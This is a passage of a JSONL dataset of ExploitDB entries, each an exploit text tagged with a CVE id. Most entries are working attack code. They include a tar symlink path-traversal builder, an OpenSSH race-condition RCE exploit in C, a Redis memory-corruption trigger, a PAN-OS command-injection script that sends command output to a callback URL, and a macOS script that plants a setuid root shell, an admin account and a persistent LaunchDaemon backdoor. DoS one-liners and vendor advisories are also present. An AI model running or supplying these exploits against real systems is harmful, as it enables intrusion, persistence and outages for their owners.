finally write/overwrite the file on the system\n\n\nimport os\nimport sys\nimport tarfile\n\nlink_name = \"normal_file\"\n\ndef check_arguments():\n if len(sys.argv) != 3:\n print(f\"Usage: {sys.argv[0]} \\n\\\nExample: {sys.argv[0]} authorized_keys ../../../../../../../../home/user1/authorized_keys\\\n \")\n sys.exit()\n content_file_path = sys.argv[1]\n target_file_path = sys.argv[2]\n\n return content_file_path, target_file_path\n\ndef create_symlink(link_name, target_path):\n os.symlink(target_path, link_name)\n print(\"[+] Created symlink: {link_name} -> {target_path}\")\n\ndef archive_files(archive_name, file_path):\n tar = tarfile.open(archive_name, 'w')\n tar.add(file_path, link_name, recursive=False)\n tar.close()\n print(f\"[+] Archived to: {archive_name}\")\n\ndef main():\n content_path, target_file = check_arguments()\n\n stage_1_archive_name = \"stage_1.tar\"\n stage_2_archive_name = \"stage_2.tar\"\n\n create_symlink(link_name, target_file)\n\n archive_files(stage_1_archive_name, link_name)\n archive_files(stage_2_archive_name, content_path)\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2024-12905", "source": "exploitdb", "timestamp": "2025-04-22T00:00:00+00:00"} {"id": "138a8cc039cf80bdef35", "text": "OneTrust SDK 6.33.0 - Denial Of Service (DoS)\n\n- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)\n- **Date**: 01/01/2025\n- **Exploit Author**: Alameen Karim Merali\n- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)\n- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)\n- **Version**: 6.33.0\n- **Tested on**: Kali Linux\n- **CVE ID**: CVE-2024-57708\n\n## Vulnerability Summary\n\nA vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.\n\n## Technical Details\n\nThe affected code includes prototype assignment logic such as:\n\n```javascript\nvar o = function(e, t) {\n return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);\n};\n```\n\nIf the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.\n\n## Proof-of-Concept (PoC)\n\n```javascript\nfunction testPrototypePollution() {\n const maliciousPayload = {\n \"__proto__\": {\n polluted: \"yes\"\n }\n };\n\n // Using vulnerable function 'o'\n try {\n o({}, maliciousPayload);\n console.log(\"After o:\", {}.polluted); // \"yes\"\n } catch (e) {\n console.error(\"Error testing o:\", e);\n }\n\n // Using Object.assign\n try {\n Object.assign({}, maliciousPayload);\n console.log(\"After Object.assign:\", {}.polluted); // \"yes\"\n } catch (e) {\n console.error(\"Error testing Object.assign:\", e);\n }\n\n // Cleanup\n delete Object.prototype.polluted;\n}\ntestPrototypePollution();\n```\n\n## Browser Console PoC (DevTools)\n\n```javascript\nvar maliciousObj = { __proto__: { hacked: true } };\nvar newObj = Object.create(maliciousObj);\nconsole.log(newObj.hacked); // true\n```\n\nScreenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)\n\n## Steps to Reproduce\n\n1. Save the PoC script above as `exploit.js`\n2. Run using Node.js: `node exploit.js`\n3. Observe polluted output (`{}.polluted === \"yes\"`)\n4. Alternatively, run the payload in browser DevTools\n\n## Impact\n\n- Global object pollution\n- Application logic errors\n- Potential DoS\n- Further exploitation depending on context\n\n## Recommendation\n\nDevelopers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.", "cve_id": "CVE-2024-57708", "source": "exploitdb", "timestamp": "2025-06-26T00:00:00+00:00"} {"id": "7ac0fb162ad2d1ed2b16", "text": "OpenSSH server (sshd) 9.8p1 - Race Condition\n\n * Exploit Title : OpenSSH server (sshd) 9.8p1 - Race Condition\n * Author : Milad Karimi (Ex3ptionaL)\n * Date : 2025-04-16\n *\n * Description:\n * Targets a signal handler race condition in OpenSSH's\n * server (sshd) on glibc-based Linux systems. It exploits a vulnerability\n * where the SIGALRM handler calls async-signal-unsafe functions, leading\n * to rce as root.\n *\n * Notes:\n * 1. Shellcode : Replace placeholder with actual payload.\n * 2. GLIBC_BASES : Needs adjustment for specific target systems.\n * 3. Timing parameters: Fine-tune based on target system responsiveness.\n * 4. Heap layout : Requires tweaking for different OpenSSH versions.\n * 5. File structure offsets: Verify for the specific glibc version.\n * -------------------------------------------------------------------------\n */\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define MAX_PACKET_SIZE (256 * 1024)\n#define LOGIN_GRACE_TIME 120\n#define MAX_STARTUPS 100\n#define CHUNK_ALIGN(s) (((s) + 15) & ~15)\n\n// Possible glibc base addresses (for ASLR bypass)\nuint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };\nint NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);\n\n// Shellcode placeholder (replace with actual shellcode)\nunsigned char shellcode[] = \"\\x90\\x90\\x90\\x90\";\n\nint setup_connection (const char *ip, int port);\nvoid send_packet (int sock, unsigned char packet_type,\n const unsigned char *data, size_t len);\nvoid prepare_heap (int sock);\nvoid time_final_packet (int sock, double *parsing_time);\nint attempt_race_condition (int sock, double parsing_time,\n uint64_t glibc_base);\ndouble measure_response_time (int sock, int error_type);\nvoid create_public_key_packet (unsigned char *packet, size_t size,\n uint64_t glibc_base);\nvoid create_fake_file_structure (unsigned char *data, size_t size,\n uint64_t glibc_base);\nvoid send_ssh_version (int sock);\nint receive_ssh_version (int sock);\nvoid send_kex_init (int sock);\nint receive_kex_init (int sock);\nint perform_ssh_handshake (int sock);\n\nint\nmain (int argc, char *argv[])\n{\n if (argc != 3)\n {\n fprintf (stderr, \"Usage: %s \\n\", argv[0]);\n exit (1);\n }\n\n const char *ip = argv[1];\n int port = atoi (argv[2]);\n double parsing_time = 0;\n int success = 0;\n\n srand (time (NULL));\n\n // Attempt exploitation for each possible glibc base address\n for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)\n {\n uint64_t glibc_base = GLIBC_BASES[base_idx];\n printf (\"Attempting exploitation with glibc base: 0x%lx\\n\",\nglibc_base);\n\n // The advisory mentions \"~10,000 tries on average\"\n for (int attempt = 0; attempt < 20000 && !success; attempt++)\n {\n if (attempt % 1000 == 0)\n {\n printf (\"Attempt %d of 20000\\n\", attempt);\n }\n\n int sock = setup_connection (ip, port);\n if (sock < 0)\n {\n fprintf (stderr, \"Failed to establish connection, attempt\n%d\\n\",\n attempt);\n continue;\n }\n\n if (perform_ssh_handshake (sock) < 0)\n {\n fprintf (stderr, \"SSH handshake failed, attempt %d\\n\",\nattempt);\n close (sock);\n continue;\n }\n\n prepare_heap (sock);\n time_final_packet (sock, &parsing_time);\n\n if (attempt_race_condition (sock, parsing_time, glibc_base))\n {\n printf (\"Possible exploitation success on attempt %d with\nglibc \"\n \"base 0x%lx!\\n\",\n attempt, glibc_base);\n success = 1;\n break;\n }\n\n close (sock);\n usleep (100000); // 100ms delay between attempts, as mentioned in\nthe\n // advisory\n }\n }\n\n return !success;\n}\n\nint\nsetup_connection (const char *ip, int port)\n{\n int sock = socket (AF_INET, SOCK_STREAM, 0);\n if (sock < 0)\n {\n perror (\"socket\");\n return -1;\n }\n\n struct sockaddr_in server_addr;\n memset (&server_addr, 0, sizeof (server_addr));\n server_addr.sin_family = AF_INET;\n server_addr.sin_port = htons (port);\n if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)\n {\n perror (\"inet_pton\");\n close (sock);\n return -1;\n }\n\n if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))\n < 0)\n {\n perror (\"connect\");\n close (sock);\n return -1;\n }\n\n // Set socket to non-blocking mode\n int flags = fcntl (sock, F_GETFL, 0);\n fcntl (sock, F_SETFL, flags | O_NONBLOCK);\n\n return sock;\n}\n\nvoid\nsend_packet (int sock, unsigned char packet_type, const unsigned ", "cve_id": "CVE-2024-6387", "source": "exploitdb", "timestamp": "2025-04-22T00:00:00+00:00"} {"id": "04e54f5ff0d2c14add7c", "text": "Redis 8.0.2 - RCE\n\n# Exploit Title: Ingress-NGINX Admission Controller v1.11.1 - FD Injection to RCE\n# Date: 2025-10-07\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://redis.io/\n# Software Link: https://redis.io/\n# Version: Affects :>= 8.0.0, < 8.0.3\n# Tested on: Ubuntu 22.04\n# CVE: CVE-2025-32023\n\nimport redis\nimport sys\n\n# --- Configuration ---\nREDIS_HOST = 'localhost'\nREDIS_PORT = 6379\nREDIS_KEY = 'hll:exp'\n\n# HLL encoding type (1 = sparse)\nHLL_SPARSE = 1\n\n\ndef p8(value):\n \"\"\"Convert integer to single byte.\"\"\"\n return bytes([value])\n\n\ndef xzero(size):\n \"\"\"\n Construct an 'xzero' run for sparse HLL:\n Creates a run-length encoding entry of zeroes with a specific size.\n \"\"\"\n if not (1 <= size <= 0x4000):\n raise ValueError(\"Invalid xzero size: must be between 1 and 0x4000\")\n size -= 1\n return p8(0b01_000000 | (size >> 8)) + p8(size & 0xff)\n\n\ndef build_malformed_hll():\n \"\"\"\n Construct a malformed HLL payload that overflows internal counters.\n \"\"\"\n payload = b'HYLL' # Magic header\n payload += p8(HLL_SPARSE) # Encoding type: sparse\n payload += p8(0) * 3 # Reserved\n payload += p8(0) * 8 # Unused (padding)\n\n assert len(payload) == 0x10 # Check header size\n\n # Append enough xzero runs to cause overflow\n payload += xzero(0x4000) * 0x20000 # == -0x80000000 when cast to signed int\n\n # Add one more run to complete the structure\n payload += p8(0b11111111) # Runlen=4, regval=0x20 (but malformed)\n\n return payload\n\n\ndef main():\n try:\n print(f\"[*] Connecting to Redis at {REDIS_HOST}:{REDIS_PORT}...\")\n r = redis.Redis(REDIS_HOST, REDIS_PORT)\n\n print(\"[*] Building malformed HyperLogLog payload...\")\n hll_payload = build_malformed_hll()\n\n print(f\"[*] Writing malformed HLL to key: {REDIS_KEY}\")\n r.set(REDIS_KEY, hll_payload)\n\n print(\"[*] Triggering HLL merge operation (pfcount)...\")\n r.pfcount(REDIS_KEY, REDIS_KEY)\n\n print(\"[+] Exploit triggered successfully.\")\n except Exception as e:\n print(f\"[!] Exploit failed: {e}\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-32023", "source": "exploitdb", "timestamp": "2026-02-04T00:00:00+00:00"} {"id": "2251528e85e2bde6e89e", "text": "Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation\n\n# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation\n# Date: 21 Apr 2024\n# Exploit Author: Kr0ff\n# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400\n# Software Link: -\n# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3\n# PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1\n# PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1\n# Tested on: Debian\n# CVE : CVE-2024-3400\n\n#!/usr/bin/env python3\n\nimport sys\n\ntry:\n import argparse\n import requests\nexcept ImportError:\n print(\"Missing dependencies, either requests or argparse not installed\")\n sys.exit(2)\n\n# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis\n# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/\n\ndef check_vuln(target: str, file: str) -> bool:\n ret = False\n\n uri = \"/ssl-vpn/hipreport.esp\"\n\n s = requests.Session()\n r = \"\"\n\n headers = {\n \"User-Agent\" : \\\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36\", # Windows 10 Chrome 118.0.0.0\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Cookie\": \\\n f\"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}\"\n }\n\n headers_noCookie = {\n \"User-Agent\" : \\\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36\" # Windows 10 Chrome 118.0.0.0\n }\n\n if not \"http://\" or not \"https://\" in target:\n target = \"http://\" + target\n try:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n except requests.exceptions.Timeout or requests.ConnectionError as e:\n print(f\"Request timed out for \\\"HTTP\\\" !{e}\")\n\n print(\"Trying with \\\"HTTPS\\\"...\")\n\n target = \"https://\" + target\n try:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n except requests.exceptions.Timeout or requests.ConnectionError as e:\n print(f\"Request timed out for \\\"HTTPS\\\"\")\n sys.exit(1)\n else:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n\n if r.status_code == 200:\n r = s.get( (target + f\"/global-protect/portal/images/{file}\"), verify=False, headers=headers_noCookie, timeout=10 )\n if r.status_code == 403:\n print(\"Target vulnerable to CVE-2024-3400\")\n ret = True\n else:\n return ret\n\n return ret\n\n\n\ndef cmdexec(target: str, callback_url: str, payload: str) -> bool:\n ret = False\n p = \"\"\n\n if \" \" in payload:\n p = payload.replace(\" \", \"${IFS)\")\n\n uri = \"/ssl-vpn/hipreport.esp\"\n\n headers = {\n \"User-Agent\" : \\\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36\", # Windows 10 Chrome 118.0.0.0\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Cookie\": \\\n f\"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`\"\n\n }\n\n s = requests.Session()\n r = \"\"\n\n if not \"http://\" or not \"https://\" in target:\n target = \"http://\" + target\n try:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n except requests.exceptions.Timeout or requests.ConnectionError as e:\n print(f\"Request timed out for \\\"HTTP\\\" !{e}\")\n\n print(\"Trying with \\\"HTTPS\\\"...\")\n\n target = \"https://\" + target\n try:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n except requests.exceptions.Timeout or requests.ConnectionError as e:\n print(f\"Request timed out for \\\"HTTPS\\\"\")\n sys.exit(1)\n else:\n r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )\n\n if not \"Success\" in r.text:\n return ret\n\n else:\n ret = True\n\n return ret\n\n#Initilize parser for arguments\ndef argparser(selection=None):\n parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )\n\n subparser = parser.add_subparsers( help=\"Available modules\", dest=\"module\")\n\n exploit_subp = subparser.add_parser( \"exploit\", help=\"Exploit module of script\")\n exploit_subp.add_argument( \"-t\", \"--target\",help=\"Target to send payload to\", required=True )\n exploit_subp.add_argument( \"-p\", \"--payload\", help=\"Payload to send (e.g: whoami)\", required=True )\n exploit_subp.add_argument( \"-c\", \"--callbackurl\", help=\"The", "cve_id": "CVE-2024-3400", "source": "exploitdb", "timestamp": "2024-04-21T00:00:00+00:00"} {"id": "a4830155512532507da4", "text": "macOS LaunchDaemon iOS 17.2 - Privilege Escalation\n\n#!/usr/bin/env python3\n# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation\n# Author: Mohammed Idrees Banyamer (@banyamer_security)\n# GitHub: https://github.com/mbanyamer\n# Date: 2025-05-31\n# Tested on: macOS Sonoma (14.x ARM64 / x86_64)\n# CVE: CVE-2025-24085\n# Type: Local Privilege Escalation\n# Platform: macOS\n# Author Country: Jordan\n# Description:\n# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute\n# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,\n# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the\n# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root\n# on macOS Sonoma systems.\n\nimport os\nimport plistlib\nimport time\nfrom pathlib import Path\n\nLAUNCHD_PLIST = \"/Library/LaunchDaemons/com.apple.securemonitor.plist\"\nPAYLOAD_SCRIPT = \"/tmp/.macroot_payload.sh\"\n\ndef create_payload():\n print(\"[+] Creating root payload script...\")\n payload = \"\"\"#!/bin/bash\n# Root shell\ncp /bin/bash /tmp/.rootbash\nchmod +s /tmp/.rootbash\nchown root:wheel /tmp/.rootbash\n\n# Add admin user\nsysadminctl -addUser pentest -password macOS123! -admin\n\n# Log file\necho \"[+] Root backdoor triggered at $(date)\" >> /tmp/.rootlog\n\n# Persistent backdoor\ncat < /Library/LaunchDaemons/com.apple.backdoor.plist\n\n\n\n\n Labelcom.apple.backdoor\n ProgramArguments/tmp/.rootbash\n RunAtLoad\n\n\nEOF\nchmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist\nchown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist\n\"\"\"\n with open(PAYLOAD_SCRIPT, \"w\") as f:\n f.write(payload)\n os.chmod(PAYLOAD_SCRIPT, 0o755)\n\ndef hijack_launchdaemon():\n print(\"[+] Hijacking LaunchDaemon plist...\")\n if not Path(LAUNCHD_PLIST).exists():\n # create a fake one\n print(\"[*] Creating fake LaunchDaemon plist for exploitation...\")\n plist_data = {\n 'Label': 'com.apple.securemonitor',\n 'ProgramArguments': [PAYLOAD_SCRIPT],\n 'RunAtLoad': True,\n }\n with open(LAUNCHD_PLIST, \"wb\") as f:\n plistlib.dump(plist_data, f)\n else:\n # hijack existing one\n with open(LAUNCHD_PLIST, 'rb') as f:\n plist = plistlib.load(f)\n plist['ProgramArguments'] = [PAYLOAD_SCRIPT]\n plist['RunAtLoad'] = True\n with open(LAUNCHD_PLIST, 'wb') as f:\n plistlib.dump(plist, f)\n\n os.system(f\"chmod 644 {LAUNCHD_PLIST}\")\n os.system(f\"chown root:wheel {LAUNCHD_PLIST}\")\n\ndef trigger_payload():\n print(\"[+] Triggering LaunchDaemon manually...\")\n os.system(f\"sudo launchctl load -w {LAUNCHD_PLIST}\")\n print(\"[+] Done. You can now execute /tmp/.rootbash -p for root shell\")\n\ndef main():\n if os.geteuid() == 0:\n print(\"[!] You are already root. No need to exploit.\")\n return\n create_payload()\n hijack_launchdaemon()\n print(\"[+] Exploit completed. Reboot or run manually:\")\n print(f\" sudo launchctl load -w {LAUNCHD_PLIST}\")\n print(\" Then run: /tmp/.rootbash -p\")\n\nif __name__ == \"__main__\":\n main()", "cve_id": "CVE-2025-24085", "source": "exploitdb", "timestamp": "2025-06-05T00:00:00+00:00"} {"id": "5e9eb5c0a65a4e2830a6", "text": "Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'\n\n[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt\n[+] twitter.com/hyp3rlinx\n[+] ISR: ApparitionSec\n\n\n[Vendor]\nwww.wyrestorm.com\n\n\n[Product]\nAPOLLO VX20 < 1.3.58\n\n\n[Vulnerability Type]\nIncorrect Access Control (DOS)\n\n\n[Affected Product Code Base]\nAPOLLO VX20 < 1.3.58, fixed in v1.3.58\n\n\n[Affected Component]\nWeb interface, reboot and reset commands\n\n\n[CVE Reference]\nCVE-2024-25736\n\n\n[Security Issue]\nAn issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.\n\n\n[Exploit/POC]\ncurl -k https://192.168.x.x/device/reboot\n\n\n[Network Access]\nRemote\n\n\n[Severity]\nHigh\n\n\n[Disclosure Timeline]\nVendor Notification: January 18, 2024\nVendor released fixed firmware v1.3.58: February 2, 2024\nFebruary 11, 2024 : Public Disclosure\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere. All content (c).\n\nhyp3rlinx", "cve_id": "CVE-2024-25736", "source": "exploitdb", "timestamp": "2024-02-26T00:00:00+00:00"} {"id": "f6ee23215a3b0a6bdb95", "text": "Xlight FTP 1.1 - Denial Of Service (DOS)\n\n# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)\n# Google Dork: N/A\n# Date: 22 July 2025\n# Exploit Author: Fernando Mengali\n# LinkedIn: https://www.linkedin.com/in/fernando-mengali/\n# Vendor Homepage: https://www.xlightftpd.com\n# Software Link: N/A\n# Version: 1.1\n# Tested on: Windows XP\n# CVE: CVE-2024-0737\n\n $sis=\"$^O\";\n\n if ($sis eq \"windows\"){\n $cmd=\"cls\";\n } else {\n $cmd=\"clear\";\n }\n\n system(\"$cmd\");\n\n intro();\n main();\n\n print \"[+] Exploiting... \\n\";\n\n my $payload = \"\\x41\"x500;\n\n my $ftp = Net::FTP->new($ip, Debug => 0) or die \"Não foi possível se conectar ao servidor: $@\";\n\n $ftp->login($payload,\"anonymous\") or die \"[+] Possibly exploited!\";\n\n $ftp->quit;\n\n print \"[+] Done - Exploited success!!!!!\\n\\n\";\n\n sub intro {\n print q {\n\n\t ,--,\n\t _ ___/ /\\|\n\t ,;'( )__, ) ~\n\t // // '--;\n\t ' \\ | ^\n\t ^ ^\n\n\t [+] LightFTP 1.1 - Denial of Service (DoS)\n\n\t [*] Coded by Fernando Mengali\n\n\t [@] e-mail: fernando.mengalli@gmail.com\n\n }\n }\n\n sub main {\n\nour ($ip, $port) = @ARGV;\n\n unless (defined($ip) && defined($port)) {\n\n print \" \\nUsage: $0 \\n\";\n exit(-1);\n\n }\n }", "cve_id": "CVE-2024-0737", "source": "exploitdb", "timestamp": "2025-07-28T00:00:00+00:00"} {"id": "dd93af5795ec5feb0cc4", "text": "ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy\n\nABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.07.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB BMS/BAS controller suffers from a weak password policy, allowing\nusers to set overly simplistic or blank passwords and usernames without restrictions.\nThis vulnerability significantly reduces account security, enabling attackers\nto exploit weak credentials for unauthorized access to the system.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2024-5898\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php\nCVE ID: CVE-2024-48845\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845\n\n\n21.04.2024\n\n-->\n\n\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n\n
\n \n \n \n \n
\n\n\n", "cve_id": "CVE-2024-48845", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "2ded21e4f65db8278884", "text": "ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\n\nABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution\nVendor: ABB Ltd.\nProduct web page: https://www.global.abb\nAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio\n Firmware: <=3.08.02\n\nSummary: ASPECT is an award-winning scalable building energy management\nand control solution designed to allow users seamless access to their\nbuilding data through standard building protocols including smart devices.\n\nDesc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated\nblind command injection vulnerability. Input passed to several POST parameters\nis not properly sanitized when writing files, allowing attackers to execute\narbitrary shell commands on the system. There is also an off-by-one error in\narray access that could lead to undefined behavior and potential DoS.\n\nTested on: GNU/Linux 3.15.10 (armv7l)\n GNU/Linux 3.10.0 (x86_64)\n GNU/Linux 2.6.32 (x86_64)\n Intel(R) Atom(TM) Processor E3930 @ 1.30GHz\n Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz\n PHP/7.3.11\n PHP/5.6.30\n PHP/5.4.16\n PHP/4.4.8\n PHP/5.3.3\n AspectFT Automation Application Server\n lighttpd/1.4.32\n lighttpd/1.4.18\n Apache/2.2.15 (CentOS)\n OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)\n OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)\n ErgoTech MIX Deployment Server 2.0.0\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5903\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php\nCVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ 